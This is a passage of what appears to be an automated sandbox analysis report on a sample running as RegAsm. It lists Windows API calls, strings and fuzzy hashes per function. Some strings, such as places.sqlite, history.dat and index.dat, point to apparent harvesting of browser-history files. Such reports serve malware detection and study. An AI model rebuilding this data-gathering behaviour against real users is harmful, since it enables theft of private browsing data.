                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                  • String ID: history.dat$places.sqlite
                                                                                  • API String ID: 2641622041-467022611
                                                                                  • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                  • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                  APIs
                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 839530781-0
                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID: *.*$index.dat
                                                                                  • API String ID: 1974802433-2863569691
                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 3397143404-0
                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                  • String ID:
                                                                                  • API String ID: 1125800050-0
                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                  • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleSleep
                                                                                  • String ID: }A
                                                                                  • API String ID: 252777609-2138825249
                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                  APIs
                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                  • free.MSVCRT ref: 00409A31
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: freemallocmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3056473165-0
                                                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d
                                                                                  • API String ID: 0-2564639436
                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: BINARY
                                                                                  • API String ID: 2221118986-907554435
                                                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp
                                                                                  • String ID: /stext
                                                                                  • API String ID: 2081463915-3817206916
                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                  APIs
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                  • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 2445788494-0
                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3150196962-0
                                                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                  APIs
                                                                                  Strings
                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: malloc
                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                  • API String ID: 2803490479-1168259600
                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmpmemset
                                                                                  • String ID:
                                                                                  • API String ID: 1065087418-0
                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                  APIs
                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                  • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1381354015-0
                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID:
                                                                                  • API String ID: 2221118986-0
                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                  APIs
                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                  • String ID:
                                                                                  • API String ID: 2154303073-0
                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                  APIs
                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3150196962-0
                                                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                  APIs
                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$PointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 3154509469-0
                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                  APIs
                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                  • String ID:
                                                                                  • API String ID: 4232544981-0
                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                  APIs
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                  Memory Dump Source
